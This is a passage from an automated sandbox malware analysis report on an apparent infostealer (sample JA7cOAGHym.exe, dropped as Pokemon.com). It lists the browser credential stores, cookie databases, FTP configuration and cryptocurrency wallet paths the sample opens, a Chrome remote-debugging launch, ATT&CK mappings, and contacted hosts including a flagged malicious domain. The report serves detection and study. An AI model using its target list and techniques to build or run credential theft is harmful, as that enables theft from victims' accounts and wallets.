(Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Pokemon.com Binary or memory string: WIN_81
                Source: Pokemon.com Binary or memory string: WIN_XP
                Source: Pokemon.com Binary or memory string: WIN_XPe
                Source: Pokemon.com Binary or memory string: WIN_VISTA
                Source: Pokemon.com Binary or memory string: WIN_7
                Source: Pokemon.com Binary or memory string: WIN_8
                Source: Yara match File source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_00112263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00112263
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_00111C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_00111C61
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 1 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 111 Masquerading | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph. ID: 1581382, Sample: JA7cOAGHym.exe, Startdate: 27/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                JA7cOAGHym.exe | 40% | Virustotal | | Browse
                JA7cOAGHym.exe | 29% | ReversingLabs | Win32.Trojan.Generic |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\208079\Pokemon.com | 0% | ReversingLabs | |

                No Antivirus matches

                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                https://anglebug.com/7320$ | 0% | Avira URL Cloud | safe |
                https://anglebug.com/7489$ | 0% | Avira URL Cloud | safe |
                https://fa5lt.xyztosh; | 0% | Avira URL Cloud | safe |
                https://optimizatgoogs.cm/downlMIZATION | 0% | Avira URL Cloud | safe |

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
                chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
                t.me | 149.154.167.99 | true | false | | high
                fa5lt.xyz | 116.203.8.178 | true | true | | unknown
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
                sb.scorecardresearch.com | 18.161.69.117 | true | false | | high
                www.google.com | 142.250.181.68 | true | false | | high
                s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
                googlehosted.l.googleusercontent.com | 142.250.181.65 | true | false | | high
                clients2.googleusercontent.com | unknown | unknown | false | | high
                bzib.nelreports.net | unknown | unknown | false | | high
                assets.msn.com | unknown | unknown | false | | high
                BjQpTJiVkzRqS.BjQpTJiVkzRqS | unknown | unknown | false | | unknown
                ntp.msn.com | unknown | unknown | false | | high

                Name | Malicious | Antivirus Detection | Reputation
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307255691&w=0&anoncknm=app_anon&NoResponseBody=true | false | | high
                https://assets.msn.com/statics/icons/favicon_newtabpage.png | false | | high
                https://sb.scorecardresearch.com/b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null | false | | high
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307254838&w=0&anoncknm=app_anon&NoResponseBody=true | false | | high
                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high
                https://steamcommunity.com/profiles/76561199809363512 | false | | high
                https://t.me/k04ael | false | | high
                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high
                https://sb.scorecardresearch.com/b?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null | false | | high

                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                      high
                                                                                                                      http://anglebug.com/4722chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://drive-daily-4.cchrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refPokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drfalse
                                                                                                                                    high
                                                                                                                                    https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://docs.google.com/document/doglchrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://anglebug.com/3502chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://anglebug.com/3623chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://anglebug.com/3625chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://anglebug.com/3624chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://t.mPokemon.com, 0000000C.00000003.2439032795.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439337123.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439113890.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439095251.0000000003FE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiPokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://anglebug.com/3862chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000010.00000003.2628640201.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626391112.00007C1C00C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2643146123.00007C1C00C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2689129631.00007C1C0033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2637997719.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/4836chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://issuetracker.google.com/issues/166475273chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://ch.search.yahoo.com/favicon.icochrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://anglebug.com/3970chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://apis.google.comchrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allPokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
